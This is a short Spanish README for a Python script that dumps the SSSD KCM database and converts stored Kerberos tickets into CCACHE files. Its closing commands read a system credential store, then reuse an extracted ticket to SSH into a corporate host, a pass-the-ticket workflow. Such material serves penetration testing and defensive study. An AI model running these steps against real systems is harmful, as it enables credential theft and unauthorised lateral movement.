
Volcar tickets Kerberos de la base de datos KCM de SSSD
Script rápido para volcar la base de datos KCM utilizada por SSSD y recuperar tickets de Kerberos en formato CCACHE.
Inicialmente basado en SSSDKCMExtractor y KCMTicketFormatter.
Desde la versión 2.0.0 (2018-08-13), el almacenamiento backend del respondedor KCM de SSSD ya no cifra el contenido de la base de datos. Sin embargo, todavía depende de una base de datos LDB (a su vez basada en TDB), lo que la hace fácilmente consultable mediante consultas similares a LDAP.
SSSD utiliza un formato de almacenamiento personalizado para los tickets de Kerberos, que puede convertirse a archivos CCACHE estándar con este script.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local